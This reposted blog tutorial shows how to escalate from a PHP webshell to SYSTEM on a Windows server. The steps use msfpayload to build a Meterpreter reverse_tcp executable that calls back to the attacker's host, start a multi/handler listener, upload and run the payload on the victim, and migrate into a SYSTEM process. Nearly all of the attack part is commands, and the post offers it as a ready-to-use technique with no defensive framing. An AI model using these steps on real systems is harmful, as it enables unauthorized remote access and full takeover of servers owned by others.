[【转载】]MsfPayload反弹完美提权

2015-08-12 浏览:
[【转载】]MsfPayload反弹完美提权
评论(0)复制地址

 Author: V5est0r  @binghesec

I  am learning MSF recently , So I think it can be used to Promote Authority.


Firstly, there is a PHP webshell ;As what can be seen , our current privilege is nt(network user).

image

Let's configure our MSF:
msfpayload windows/meterpreter/reverse_tcp LHOST=YourIp LPORT=8282 X>/tmp/binghesec.exe

image


 

It will make a file named binghesec.exe in directory "/tmp/" , you should copy it to you local system.

Then execute the following command to listening the port 8282:

  • use exploit/multi/handler

  • set PAYLOAD windows/meterpreter/reverse_tcp

  • set LHOST YourIp

  • set LPORT 8282

 

 

image

 

Then

 

show options

 

image

 

image

 

If no errors,execute:

 

 exploit

 

 

 

image

 

 

Then upload the file binghesec.exe to remote server mechine.
Let't run the file binghesec.exe in remote server, oh! what happend??

 

image

 

Yeah,The Meterpreter Session has created,
Execute command : shell
then :whoami
nt(network user)

then back to meterpreter session:exit
Excute "ps" to see the tasklist , try to find a precess running as SYSTEM and mark its pid:

image

 

 

Then Execute:

   migrate Pid

 

 

 

Yeah,succeed!Our session has already Transfered to a SYSTEM process:shell -- whoani -- SYSTEM!!

 

image

 

image


 

评论(0)复制地址
发布:soojoy | 分类:提权相关 | Tags:

相关文章:

发表留言

记住我,下次回复时不用重新输入个人信息
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。